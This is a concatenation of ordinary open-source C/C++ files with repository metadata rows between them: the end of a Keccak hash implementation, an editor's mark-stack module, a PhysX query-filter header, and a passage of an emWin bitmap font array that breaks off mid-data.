#ifdef ProvideFast1152
static void KeccakPermutationOnWordsAfterXoring1152bits(UINT64 *state, const UINT64 *input)
{
declareABCDE
#if (Unrolling != 24)
unsigned int i;
#endif
copyFromStateAndXor1152bits(A, state, input)
rounds
#if defined(UseMMX)
_mm_empty();
#endif
}
#endif
#ifdef ProvideFast1344
static void KeccakPermutationOnWordsAfterXoring1344bits(UINT64 *state, const UINT64 *input)
{
declareABCDE
#if (Unrolling != 24)
unsigned int i;
#endif
copyFromStateAndXor1344bits(A, state, input)
rounds
#if defined(UseMMX)
_mm_empty();
#endif
}
#endif
static void KeccakInitialize()
{
}
static void KeccakInitializeState(unsigned char *state)
{
memset(state, 0, 200);
#ifdef UseBebigokimisa
((UINT64*)state)[ 1] = ~(UINT64)0;
((UINT64*)state)[ 2] = ~(UINT64)0;
((UINT64*)state)[ 8] = ~(UINT64)0;
((UINT64*)state)[12] = ~(UINT64)0;
((UINT64*)state)[17] = ~(UINT64)0;
((UINT64*)state)[20] = ~(UINT64)0;
#endif
}
static void KeccakPermutation(unsigned char *state)
{
// We assume the state is always stored as words
KeccakPermutationOnWords((UINT64*)state);
}
#if (PLATFORM_BYTE_ORDER == IS_BIG_ENDIAN)
static void fromBytesToWord(UINT64 *word, const UINT8 *bytes)
{
unsigned int i;
*word = 0;
for(i=0; i<(64/8); i++)
*word |= (UINT64)(bytes[i]) << (8*i);
}
#endif
#ifdef ProvideFast576
static void KeccakAbsorb576bits(unsigned char *state, const unsigned char *data)
{
#if (PLATFORM_BYTE_ORDER == IS_LITTLE_ENDIAN)
KeccakPermutationOnWordsAfterXoring576bits((UINT64*)state, (const UINT64*)data);
#else
UINT64 dataAsWords[9];
unsigned int i;
for(i=0; i<9; i++)
fromBytesToWord(dataAsWords+i, data+(i*8));
KeccakPermutationOnWordsAfterXoring576bits((UINT64*)state, dataAsWords);
#endif
}
#endif
#ifdef ProvideFast832
static void KeccakAbsorb832bits(unsigned char *state, const unsigned char *data)
{
#if (PLATFORM_BYTE_ORDER == IS_LITTLE_ENDIAN)
KeccakPermutationOnWordsAfterXoring832bits((UINT64*)state, (const UINT64*)data);
#else
UINT64 dataAsWords[13];
unsigned int i;
for(i=0; i<13; i++)
fromBytesToWord(dataAsWords+i, data+(i*8));
KeccakPermutationOnWordsAfterXoring832bits((UINT64*)state, dataAsWords);
#endif
}
#endif
#ifdef ProvideFast1024
static void KeccakAbsorb1024bits(unsigned char *state, const unsigned char *data)
{
#if (PLATFORM_BYTE_ORDER == IS_LITTLE_ENDIAN)
KeccakPermutationOnWordsAfterXoring1024bits((UINT64*)state, (const UINT64*)data);
#else
UINT64 dataAsWords[16];
unsigned int i;
for(i=0; i<16; i++)
fromBytesToWord(dataAsWords+i, data+(i*8));
KeccakPermutationOnWordsAfterXoring1024bits((UINT64*)state, dataAsWords);
#endif
}
#endif
#ifdef ProvideFast1088
static void KeccakAbsorb1088bits(unsigned char *state, const unsigned char *data)
{
#if (PLATFORM_BYTE_ORDER == IS_LITTLE_ENDIAN)
KeccakPermutationOnWordsAfterXoring1088bits((UINT64*)state, (const UINT64*)data);
#else
UINT64 dataAsWords[17];
unsigned int i;
for(i=0; i<17; i++)
fromBytesToWord(dataAsWords+i, data+(i*8));
KeccakPermutationOnWordsAfterXoring1088bits((UINT64*)state, dataAsWords);
#endif
}
#endif
#ifdef ProvideFast1152
static void KeccakAbsorb1152bits(unsigned char *state, const unsigned char *data)
{
#if (PLATFORM_BYTE_ORDER == IS_LITTLE_ENDIAN)
KeccakPermutationOnWordsAfterXoring1152bits((UINT64*)state, (const UINT64*)data);
#else
UINT64 dataAsWords[18];
unsigned int i;
for(i=0; i<18; i++)
fromBytesToWord(dataAsWords+i, data+(i*8));
KeccakPermutationOnWordsAfterXoring1152bits((UINT64*)state, dataAsWords);
#endif
}
#endif
#ifdef ProvideFast1344
static void KeccakAbsorb1344bits(unsigned char *state, const unsigned char *data)
{
#if (PLATFORM_BYTE_ORDER == IS_LITTLE_ENDIAN)
KeccakPermutationOnWordsAfterXoring1344bits((UINT64*)state, (const UINT64*)data);
#else
UINT64 dataAsWords[21];
unsigned int i;
for(i=0; i<21; i++)
fromBytesToWord(dataAsWords+i, data+(i*8));
KeccakPermutationOnWordsAfterXoring1344bits((UINT64*)state, dataAsWords);
#endif
}
#endif
static void KeccakAbsorb(unsigned char *state, const unsigned char *data, unsigned int laneCount)
{
#if (PLATFORM_BYTE_ORDER == IS_LITTLE_ENDIAN)
KeccakPermutationOnWordsAfterXoring((UINT64*)state, (const UINT64*)data, laneCount);
#else
UINT64 dataAsWords[25];
unsigned int i;
for(i=0; i<laneCount; i++)
fromBytesToWord(dataAsWords+i, data+(i*8));
KeccakPermutationOnWordsAfterXoring((UINT64*)state, dataAsWords, laneCount);
#endif
}
#if (PLATFORM_BYTE_ORDER == IS_BIG_ENDIAN)
static void fromWordToBytes(UINT8 *bytes, const UINT64 word)
{
unsigned int i;
for(i=0; i<(64/8); i++)
bytes[i] = (word >> (8*i)) & 0xFF;
}
#endif
#ifdef ProvideFast1024
static void KeccakExtract1024bits(const unsigned char *state, unsigned char *data)
{
#if (PLATFORM_BYTE_ORDER == IS_LITTLE_ENDIAN)
memcpy(data, state, 128);
#else
unsigned int i;
for(i=0; i<16; i++)
fromWordToBytes(data+(i*8), ((const UINT64*)state)[i]);
#endif
#ifdef UseBebigokimisa
((UINT64*)data)[ 1] = ~((UINT64*)data)[ 1];
((UINT64*)data)[ 2] = ~((UINT64*)data)[ 2];
((UINT64*)data)[ 8] = ~((UINT64*)data)[ 8];
((UINT64*)data)[12] = ~((UINT64*)data)[12];
#endif
}
#endif
static void KeccakExtract(const unsigned char *state, unsigned char *data, unsigned int laneCount)
{
#if (PLATFORM_BYTE_ORDER == IS_LITTLE_ENDIAN)
memcpy(data, state, laneCount*8);
#else
unsigned int i;
for(i=0; i<laneCount; i++)
fromWordToBytes(data+(i*8), ((const UINT64*)state)[i]);
#endif
#ifdef UseBebigokimisa
if (laneCount > 1) {
((UINT64*)data)[ 1] = ~((UINT64*)data)[ 1];
if (laneCount > 2) {
((UINT64*)data)[ 2] = ~((UINT64*)data)[ 2];
if (laneCount > 8) {
((UINT64*)data)[ 8] = ~((UINT64*)data)[ 8];
if (laneCount > 12) {
((UINT64*)data)[12] = ~((UINT64*)data)[12];
if (laneCount > 17) {
((UINT64*)data)[17] = ~((UINT64*)data)[17];
if (laneCount > 20) {
((UINT64*)data)[20] = ~((UINT64*)data)[20];
}
}
}
}
}
}
#endif
}
| 28.867446 | 107 | 0.655615 |
9d9789bef44f3aa49aa72165368ae0c63577da3a | 5,637 | c | C | src/markstack.c | FredFoonly/poe | 7175c20c6321eb9c23152a56f8544c51553eec73 | [
"BSD-3-Clause"
] | 2 | 2017-06-10T06:44:12.000Z | 2020-03-20T20:00:00.000Z | src/markstack.c | FredFoonly/poe | 7175c20c6321eb9c23152a56f8544c51553eec73 | [
"BSD-3-Clause"
] | null | null | null | src/markstack.c | FredFoonly/poe | 7175c20c6321eb9c23152a56f8544c51553eec73 | [
"BSD-3-Clause"
] | 1 | 2020-10-15T16:26:56.000Z | 2020-10-15T16:26:56.000Z |
#include <stdlib.h>
#include <stdint.h>
#include <stdbool.h>
#include "trace.h"
#include "logging.h"
#include "utils.h"
#include "poe_err.h"
#include "vec.h"
#include "cstr.h"
#include "bufid.h"
#include "mark.h"
#include "markstack.h"
#include "margins.h"
#include "tabstops.h"
#include "key_interp.h"
#include "buffer.h"
void _ensure_have_mark();
static struct pivec_t/*MARK*/ _mark_stack;
void init_markstack()
{
TRACE_ENTER;
pivec_init(&_mark_stack, 10);
_ensure_have_mark();
TRACE_EXIT;
}
void shutdown_markstack()
{
TRACE_ENTER;
pivec_destroy(&_mark_stack);
TRACE_EXIT;
}
//
// markstack
//
void markstack_pop_marks_in_buffer(BUFFER buf)
{
TRACE_ENTER;
int i;
for (i = 0; i < pivec_count(&_mark_stack); ) {
MARK mark = (MARK)pivec_get(&_mark_stack, i);
BUFFER markbuf = BUFFER_NULL;
POE_ERR err = mark_get_buffer(mark, &markbuf);
if (err == POE_ERR_OK && markbuf == buf) {
pivec_remove(&_mark_stack, i);
}
else {
i++;
}
}
_ensure_have_mark();
TRACE_EXIT;
}
MARK markstack_push()
{
TRACE_ENTER;
if (pivec_count(&_mark_stack) > 0)
mark_clrflags(markstack_current(), MARK_FLG_VISIBLE);
MARK m = mark_alloc(MARK_FLG_VISIBLE);
pivec_insert(&_mark_stack, 0, (intptr_t)m);
TRACE_RETURN(m);
}
POE_ERR markstack_pop()
{
TRACE_ENTER;
int nmarks = pivec_count(&_mark_stack);
if (nmarks == 0) {
TRACE_RETURN(POE_ERR_NO_MARKS_SAVED);
}
else if (nmarks == 1) {
mark_setflags(markstack_current(), MARK_FLG_VISIBLE);
TRACE_RETURN(POE_ERR_NO_MARKS_SAVED);
}
else {
MARK oldmark = (MARK)pivec_get(&_mark_stack, 0);
mark_free(oldmark);
pivec_remove(&_mark_stack, 0);
mark_setflags(markstack_current(), MARK_FLG_VISIBLE);
TRACE_RETURN(POE_ERR_OK);
}
}
MARK markstack_current()
{
TRACE_ENTER;
_ensure_have_mark();
MARK rval = MARK_NULL;
int nmarks = pivec_count(&_mark_stack);
if (nmarks > 0)
rval = (MARK)pivec_get(&_mark_stack, 0);
TRACE_RETURN(rval);
}
MARK markstack_hittest_point(BUFFER buf, int row, int col, int flags_mask, int flags_chk)
{
TRACE_ENTER;
int i, n = pivec_count(&_mark_stack);
for (i = 0; i < n; i++) {
MARK m = (MARK)pivec_get(&_mark_stack, i);
if (mark_hittest_point(m, buf, row, col, flags_mask, flags_chk))
TRACE_RETURN(m);
}
TRACE_RETURN(MARK_NULL);
}
MARK markstack_hittest_line(BUFFER buf, int row, int flags_mask, int flags_chk)
{
TRACE_ENTER;
int i, n = pivec_count(&_mark_stack);
for (i = 0; i < n; i++) {
MARK m = (MARK)pivec_get(&_mark_stack, i);
if (mark_hittest_line(m, buf, row, flags_mask, flags_chk)) {
TRACE_RETURN(m);
}
}
TRACE_RETURN(MARK_NULL);
}
POE_ERR markstack_cur_unmark()
{
TRACE_ENTER;
_ensure_have_mark();
mark_unmark(markstack_current());
TRACE_RETURN(POE_ERR_OK);
}
POE_ERR markstack_cur_get_buffer(BUFFER* buf)
{
TRACE_ENTER;
_ensure_have_mark();
MARK curmark = markstack_current();
POE_ERR rval;
if (mark_exists(curmark))
rval = mark_get_buffer(curmark, buf);
else
rval = POE_ERR_NO_MARKED_AREA;
TRACE_RETURN(rval);
}
POE_ERR markstack_cur_get_type(enum marktype* typ)
{
TRACE_ENTER;
_ensure_have_mark();
MARK curmark = markstack_current();
POE_ERR rval;
if (mark_exists(curmark))
rval = mark_get_type(curmark, typ);
else
rval = POE_ERR_NO_MARKED_AREA;
TRACE_RETURN(rval);
}
POE_ERR markstack_cur_get_start(int* line, int* col)
{
TRACE_ENTER;
_ensure_have_mark();
MARK curmark = markstack_current();
POE_ERR rval;
if (mark_exists(curmark))
rval = mark_get_start(curmark, line, col);
else
rval = POE_ERR_NO_MARKED_AREA;
TRACE_RETURN(rval);
}
POE_ERR markstack_cur_get_end(int* line, int* col)
{
TRACE_ENTER;
_ensure_have_mark();
MARK curmark = markstack_current();
POE_ERR rval;
if (mark_exists(curmark))
rval = mark_get_end(curmark, line, col);
else
rval = POE_ERR_NO_MARKED_AREA;
TRACE_RETURN(rval);
}
POE_ERR markstack_cur_get_bounds(enum marktype *typ, int* l1, int* c1, int* l2, int* c2)
{
TRACE_ENTER;
_ensure_have_mark();
MARK curmark = markstack_current();
POE_ERR rval;
if (mark_exists(curmark))
rval = mark_get_bounds(curmark, typ, l1, c1, l2, c2);
else
rval = POE_ERR_NO_MARKED_AREA;
TRACE_RETURN(rval);
}
POE_ERR markstack_cur_place(enum marktype typ, BUFFER buf, int line, int col)
{
TRACE_ENTER;
_ensure_have_mark();
MARK curmark = markstack_current();
POE_ERR rval;
buffer_must_exist(__func__, buf);
if (mark_exists(curmark))
rval = mark_place(curmark, typ, buf, line, col);
else
rval = POE_ERR_NO_MARKED_AREA;
TRACE_RETURN(rval);
}
POE_ERR markstack_cur_start(enum marktype typ, BUFFER buf, int line, int col)
{
TRACE_ENTER;
_ensure_have_mark();
MARK curmark = markstack_current();
POE_ERR rval;
if (mark_exists(curmark))
rval = mark_start(curmark, typ, buf, line, col);
else
rval = POE_ERR_NO_MARKED_AREA;
TRACE_RETURN(rval);
}
POE_ERR markstack_cur_extend(enum marktype typ, BUFFER buf, int line, int col)
{
TRACE_ENTER;
_ensure_have_mark();
MARK curmark = markstack_current();
POE_ERR rval;
if (mark_exists(curmark))
rval = mark_extend(curmark, typ, buf, line, col);
else
rval = POE_ERR_NO_MARKED_AREA;
TRACE_RETURN(rval);
}
void markstack_cur_seal(void)
{
TRACE_ENTER;
_ensure_have_mark();
MARK curmark = markstack_current();
if (mark_exists(curmark))
mark_seal(curmark);
TRACE_EXIT;
}
//
// internal
//
void _ensure_have_mark()
{
if (pivec_count(&_mark_stack) == 0)
markstack_push();
}
| 19.848592 | 89 | 0.691503 |
cb99c1d6e81e624fb6724de474bb68c0a48a442d | 9,070 | h | C | Code/Engine/Physics/PhysicsQuery.h | JuanluMorales/KRG | f3a11de469586a4ef0db835af4bc4589e6b70779 | [
"MIT"
] | 419 | 2022-01-27T19:37:43.000Z | 2022-03-31T06:14:22.000Z | Code/Engine/Physics/PhysicsQuery.h | jagt/KRG | ba20cd8798997b0450491b0cc04dc817c4a4bc76 | [
"MIT"
] | 2 | 2022-01-28T20:35:33.000Z | 2022-03-13T17:42:52.000Z | Code/Engine/Physics/PhysicsQuery.h | jagt/KRG | ba20cd8798997b0450491b0cc04dc817c4a4bc76 | [
"MIT"
] | 20 | 2022-01-27T20:41:02.000Z | 2022-03-26T16:16:57.000Z | #pragma once
#include "_Module/API.h"
#include "Engine/Core/Entity/EntityComponent.h"
#include "System/Core/Types/UUID.h"
#include "PhysX.h"
//-------------------------------------------------------------------------
namespace KRG::Physics
{
//-------------------------------------------------------------------------
// Results from a given query
//-------------------------------------------------------------------------
template<int N>
struct RayCastResultBuffer : public physx::PxHitBuffer<physx::PxRaycastHit>
{
RayCastResultBuffer() : physx::PxHitBuffer<physx::PxRaycastHit>( m_hits, N ) {}
KRG_FORCE_INLINE Vector GetHitPosition() const
{
KRG_ASSERT( hasBlock );
return FromPx( block.position );
}
Vector m_start;
Vector m_end;
physx::PxRaycastHit m_hits[N];
};
using RayCastResults = RayCastResultBuffer<32>;
//-------------------------------------------------------------------------
template<int N>
struct SweepResultBuffer : public physx::PxHitBuffer<physx::PxSweepHit>
{
friend class Scene;
public:
SweepResultBuffer() : physx::PxHitBuffer<physx::PxSweepHit>( m_hits, N ) {}
KRG_FORCE_INLINE bool HadInitialOverlap() const { return hasBlock && block.hadInitialOverlap(); }
KRG_FORCE_INLINE Vector const& GetShapePosition() const { return m_finalShapePosition; }
KRG_FORCE_INLINE float GetSweptDistance() const { KRG_ASSERT( hasBlock ); return block.distance; }
KRG_FORCE_INLINE float GetRemainingDistance() const { return m_remainingDistance; }
private:
inline void CalculateFinalShapePosition( float epsilon )
{
if ( !hasBlock )
{
m_finalShapePosition = m_sweepEnd;
m_remainingDistance = 0.f;
}
else if ( block.hadInitialOverlap() )
{
m_finalShapePosition = m_sweepStart;
m_remainingDistance = ( m_sweepEnd - m_sweepStart ).GetLength3();
}
else // Regular blocking hit
{
Vector sweepDirection;
float originalSweepDistance = 0.0f;
( m_sweepEnd - m_sweepStart ).ToDirectionAndLength3( sweepDirection, originalSweepDistance );
// Calculate the final shape position and remaining distance (including the epsilon)
float const finalSweepDistance( Math::Max( 0.0f, ( block.distance - epsilon ) ) );
m_finalShapePosition = Vector::MultiplyAdd( sweepDirection, Vector( finalSweepDistance ), m_sweepStart );
m_remainingDistance = originalSweepDistance - finalSweepDistance;
}
}
public:
Quaternion m_orientation = Quaternion::Identity;
Vector m_sweepStart;
Vector m_sweepEnd;
Vector m_finalShapePosition;
float m_remainingDistance;
physx::PxSweepHit m_hits[N];
};
using SweepResults = SweepResultBuffer<32>;
//-------------------------------------------------------------------------
template<int N>
struct OverlapResultBuffer : public physx::PxHitBuffer<physx::PxOverlapHit>
{
OverlapResultBuffer() : physx::PxHitBuffer<physx::PxOverlapHit>( m_hits, N ) {}
Vector m_position;
Quaternion m_orientation = Quaternion::Identity;
physx::PxOverlapHit m_hits[N];
};
using OverlapResults = OverlapResultBuffer<32>;
//-------------------------------------------------------------------------
// PhysX Query Filter
//-------------------------------------------------------------------------
// Helper to abstract some PhysX complexity, and to provide syntactic sugar
// Currently word0 in the filter data is used to specify the layer to query against (all other words are currently left unset)
// For the currently define layers in the engine, please refer to "PhysicsLayers.h"
class QueryFilter final : public physx::PxQueryFilterCallback
{
public:
enum class MobilityFilter
{
None,
IgnoreStatic,
IgnoreDynamic
};
public:
// By default queries will collide against ALL static and dynamic actors
// The filter data is set by default to zero which skips the PxFilterData step - so will collide with all layers
QueryFilter()
: m_filterData( physx::PxQueryFilterData( physx::PxQueryFlag::eDYNAMIC | physx::PxQueryFlag::eSTATIC | physx::PxQueryFlag::ePREFILTER ) )
{}
// Create a query specifying the layer mask to use for filtering
QueryFilter( uint32 layerMask )
: m_filterData( physx::PxQueryFilterData( physx::PxFilterData( layerMask, 0, 0, 0 ), physx::PxQueryFlag::eDYNAMIC | physx::PxQueryFlag::eSTATIC | physx::PxQueryFlag::ePREFILTER ) )
{}
// Layer Filtering
//-------------------------------------------------------------------------
// This allows you to specify what layers this query will be run against (e.g. collide with only the environment or with characters, etc... )
void SetLayerMask( uint32 layerMask )
{
m_filterData.data.word0 = layerMask;
}
// Mobility Filtering
//-------------------------------------------------------------------------
// By default queries will collide against both static and dynamic actors
inline bool IsQueryingStaticActors()
{
return m_filterData.flags.isSet( physx::PxQueryFlag::eSTATIC );
}
inline bool IsQueryingDynamicActors()
{
return m_filterData.flags.isSet( physx::PxQueryFlag::eDYNAMIC );
}
inline void SetMobilityFilter( MobilityFilter filter )
{
switch ( filter )
{
case MobilityFilter::None:
m_filterData.flags |= physx::PxQueryFlag::eSTATIC;
m_filterData.flags |= ~physx::PxQueryFlag::eDYNAMIC;
break;
case MobilityFilter::IgnoreStatic:
m_filterData.flags &= ~physx::PxQueryFlag::eSTATIC;
m_filterData.flags |= physx::PxQueryFlag::eDYNAMIC;
break;
case MobilityFilter::IgnoreDynamic:
m_filterData.flags |= physx::PxQueryFlag::eSTATIC;
m_filterData.flags &= ~physx::PxQueryFlag::eDYNAMIC;
break;
}
}
// Ignore
//-------------------------------------------------------------------------
void AddIgnoredComponent( ComponentID const& componentID )
{
KRG_ASSERT( componentID.IsValid() );
m_ignoredComponents.emplace_back( componentID );
}
void AddIgnoredEntity( EntityID const& entityID )
{
KRG_ASSERT( entityID.IsValid() );
m_ignoredEntities.emplace_back( entityID );
}
private:
virtual physx::PxQueryHitType::Enum preFilter( physx::PxFilterData const& filterData, physx::PxShape const* pShape, physx::PxRigidActor const* pActor, physx::PxHitFlags& queryFlags ) override
{
for ( auto const& ignoredComponentID : m_ignoredComponents )
{
auto pOwnerComponent = reinterpret_cast<EntityComponent const*>( pActor->userData );
if ( pOwnerComponent->GetID() == ignoredComponentID )
{
return physx::PxQueryHitType::eNONE;
}
}
//-------------------------------------------------------------------------
for ( auto const& ignoredEntityID : m_ignoredEntities )
{
auto pOwnerComponent = reinterpret_cast<EntityComponent const*>( pActor->userData );
if ( pOwnerComponent->GetEntityID() == ignoredEntityID )
{
return physx::PxQueryHitType::eNONE;
}
}
//-------------------------------------------------------------------------
return physx::PxQueryHitType::eBLOCK;
}
virtual physx::PxQueryHitType::Enum postFilter( physx::PxFilterData const& filterData, physx::PxQueryHit const& hit ) override
{
KRG_UNREACHABLE_CODE(); // Not currently used
return physx::PxQueryHitType::eBLOCK;
}
public:
physx::PxQueryFilterData m_filterData;
physx::PxHitFlags m_hitFlags = physx::PxHitFlag::eDEFAULT | physx::PxHitFlag::eMTD;
TInlineVector<ComponentID, 2> m_ignoredComponents;
TInlineVector<EntityID, 2> m_ignoredEntities;
};
} | 38.595745 | 199 | 0.531202 |
8b30dd522f31b18c56c5799bbb8c9f66d14317a3 | 7,228 | c | C | AQ_1/Source/uCGUI/Font/main_interface/co2_font.c | LYJ1940696668/Company | 2cbbcef3a5239a8d720cf8bb27378bc30888bbad | [
"MIT"
] | null | null | null | AQ_1/Source/uCGUI/Font/main_interface/co2_font.c | LYJ1940696668/Company | 2cbbcef3a5239a8d720cf8bb27378bc30888bbad | [
"MIT"
] | null | null | null | AQ_1/Source/uCGUI/Font/main_interface/co2_font.c | LYJ1940696668/Company | 2cbbcef3a5239a8d720cf8bb27378bc30888bbad | [
"MIT"
] | 2 | 2020-09-11T08:02:51.000Z | 2021-05-27T09:02:37.000Z | /*********************************************************************
* SEGGER Microcontroller GmbH & Co. KG *
* Solutions for real time microcontroller applications *
* www.segger.com *
**********************************************************************
* *
* C-file generated by *
* *
* Bitmap converter for emWin V5.12. *
* Compiled Jun 29 2011, 15:28:21 *
* (C) 1998 - 2010 Segger Microcontroller GmbH & Co. KG *
* *
**********************************************************************
* *
* Source file: co2_font *
* Dimensions: 38 * 17 *
* NumColors: 16bpp: 65536 *
* *
**********************************************************************
*/
#include <stdlib.h>
#include "GUI.h"
#ifndef GUI_CONST_STORAGE
#define GUI_CONST_STORAGE const
#endif
static GUI_CONST_STORAGE unsigned short acco2_font[] = {
0x1861, 0x1861, 0x1861, 0x1861, 0x0801, 0x0001, 0x41E1, 0x5A81, 0x5AA1, 0x1841, 0x0001, 0x1841, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1021, 0x0001, 0x20A1, 0x5A81, 0x5A81, 0x41E1, 0x0001, 0x0801, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861,
0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861,
0x1861, 0x1861, 0x1861, 0x0001, 0x83C1, 0xFFE2, 0xFFE2, 0xFFE2, 0xFFE2, 0xFFE2, 0xD681, 0x1861, 0x1021, 0x1861, 0x1861, 0x1861, 0x0801, 0x3141, 0xE722, 0xFFE2, 0xFFE2, 0xFFE2, 0xFFE2, 0xFFE2, 0x83C1, 0x0001, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861,
0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861,
0x1861, 0x1861, 0x0001, 0xD661, 0xFFE2, 0xFFE2, 0xC621, 0x83C1, 0xA501, 0xFFE2, 0xFFE2, 0xFFE2, 0x1021, 0x1841, 0x1861, 0x1001, 0x41E1, 0xFFE2, 0xFFE2, 0xFFE2, 0xA4C1, 0x83C1, 0xD6A1, 0xFFE2, 0xFFE2, 0xCE41, 0x0001, 0x1861, 0x1861, 0x1861, 0x1861,
0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861,
0x1861, 0x1001, 0x7BA1, 0xFFE2, 0xFFE2, 0x2901, 0x0001, 0x0801, 0x0801, 0x0801, 0xFFC2, 0xFFE2, 0xB561, 0x0801, 0x1841, 0x1021, 0xFFE2, 0xFFE2, 0x9CA1, 0x0001, 0x0801, 0x0801, 0x0001, 0x3981, 0xFFE2, 0xFFE2, 0x83C1, 0x0801, 0x1861, 0x1861, 0x0801,
0x0001, 0x0001, 0x0001, 0x1021, 0x1861, 0x1861, 0x1861,
0x1861, 0x0001, 0xFFE2, 0xFFE2, 0x5AA1, 0x0801, 0x1861, 0x1861, 0x1861, 0x1001, 0x5261, 0xFFE2, 0xFFC2, 0x0001, 0x0801, 0x9461, 0xFFE2, 0xD6A1, 0x0001, 0x1861, 0x1861, 0x1861, 0x1861, 0x0801, 0x6B01, 0xFFE2, 0xFFE2, 0x0001, 0x1861, 0x0801, 0x9481,
0xFFE2, 0xFFE2, 0xE721, 0x39A1, 0x1001, 0x1861, 0x1861,
0x1021, 0x3981, 0xFFE2, 0xFFE2, 0x0001, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1001, 0x1861, 0x0001, 0x1861, 0x0001, 0xEF62, 0xFFE2, 0x5A61, 0x1001, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x0001, 0xFFE2, 0xFFE2, 0x49E1, 0x0001, 0x9CC1, 0xFFE2,
0xBDE1, 0x8C01, 0xFFE2, 0xFFE2, 0x2901, 0x1841, 0x1861,
0x1021, 0x5A61, 0xFFE2, 0xDEE2, 0x0001, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1841, 0x1861, 0x1861, 0x0001, 0xFFE2, 0xFFE2, 0x28E1, 0x1841, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x0801, 0xCE41, 0xFFE2, 0x7341, 0x0001, 0xFFE2, 0xDEE2,
0x0001, 0x0801, 0x1861, 0xFFE2, 0x8C01, 0x0801, 0x1861,
0x1001, 0x6B01, 0xFFE2, 0xE702, 0x0001, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x0001, 0xFFE2, 0xFFE2, 0x0001, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x0801, 0xBDC1, 0xFFE2, 0x7341, 0x1001, 0x0001, 0x2081,
0x1841, 0x1021, 0x3141, 0xFFE2, 0x7BA1, 0x1001, 0x1861,
0x1021, 0x5261, 0xFFE2, 0xE722, 0x0001, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x0001, 0x0801, 0x1841, 0x0001, 0xFFE2, 0xFFE2, 0x28E1, 0x1841, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x0001, 0xCE61, 0xFFE2, 0x7341, 0x1001, 0x1861, 0x1841,
0x1021, 0x0801, 0xF7A2, 0xFFE2, 0x2081, 0x1841, 0x1861,
0x1841, 0x1841, 0xFFE2, 0xFFE2, 0x0001, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x0001, 0xF7C2, 0xAD41, 0x2901, 0x0001, 0xE722, 0xFFE2, 0x5AA1, 0x1001, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x0001, 0xFFE2, 0xFFE2, 0x39A1, 0x1021, 0x1861, 0x1001,
0x1041, 0xF782, 0xFFE2, 0x5A81, 0x0801, 0x1861, 0x1861,
0x1861, 0x0001, 0xEF62, 0xFFE2, 0x7B81, 0x0001, 0x1861, 0x1861, 0x1861, 0x0801, 0x5241, 0xFFE2, 0xFFE2, 0x1001, 0x0801, 0x83C1, 0xFFE2, 0xEF62, 0x0001, 0x1841, 0x1861, 0x1861, 0x1861, 0x0001, 0x83C1, 0xFFE2, 0xFFE2, 0x0001, 0x1861, 0x1001, 0x2901,
0xFFE2, 0xFFE2, 0x5261, 0x0801, 0x1861, 0x1861, 0x1861,
0x1861, 0x1021, 0x5261, 0xFFE2, 0xFFE2, 0x5AA1, 0x0001, 0x0801, 0x0001, 0x3121, 0xFFE2, 0xFFE2, 0xA501, 0x0801, 0x1861, 0x0801, 0xFFE2, 0xFFE2, 0xD681, 0x0801, 0x0001, 0x0801, 0x0001, 0x7B81, 0xFFE2, 0xFFE2, 0x62E1, 0x1001, 0x1841, 0x20C1, 0xFFE2,
0xFFC2, 0x20A1, 0x0001, 0x0801, 0x1001, 0x1861, 0x1861,
0x1861, 0x1861, 0x0001, 0xAD41, 0xFFE2, 0xFFE2, 0xF7A2, 0xBDC1, 0xE721, 0xFFE2, 0xFFE2, 0xEF62, 0x0801, 0x1861, 0x1861, 0x1021, 0x20C1, 0xFFE2, 0xFFE2, 0xFFE2, 0xD681, 0xC601, 0xFFE2, 0xFFE2, 0xFFE2, 0x9461, 0x0001, 0x1861, 0x0001, 0xDEE1, 0xFFE2,
0x8C41, 0x83C1, 0x8C21, 0x9441, 0x6B21, 0x1001, 0x1861,
0x1861, 0x1861, 0x1861, 0x0001, 0x7361, 0xF7A2, 0xFFE2, 0xFFE2, 0xFFE2, 0xFFE2, 0x9CC1, 0x0801, 0x1841, 0x1861, 0x1861, 0x1861, 0x1021, 0x1001, 0xAD41, 0xFFE2, 0xFFE2, 0xFFE2, 0xFFE2, 0xDF01, 0x49E1, 0x0001, 0x1861, 0x1861, 0x0001, 0xFFE2, 0xFFE2,
0xFFE2, 0xFFE2, 0xFFE2, 0xFFE2, 0xD6A1, 0x0801, 0x1861,
0x1861, 0x1861, 0x1861, 0x1861, 0x1001, 0x0001, 0x0801, 0x3981, 0x20C1, 0x0001, 0x0801, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1841, 0x0801, 0x0001, 0x2901, 0x3981, 0x0001, 0x0001, 0x1021, 0x1861, 0x1861, 0x1861, 0x1861, 0x0001, 0x0001,
0x0001, 0x0001, 0x0001, 0x0001, 0x0801, 0x1861, 0x1861,
0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1041, 0x1841, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1841, 0x1041, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861,
0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861,
0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861,
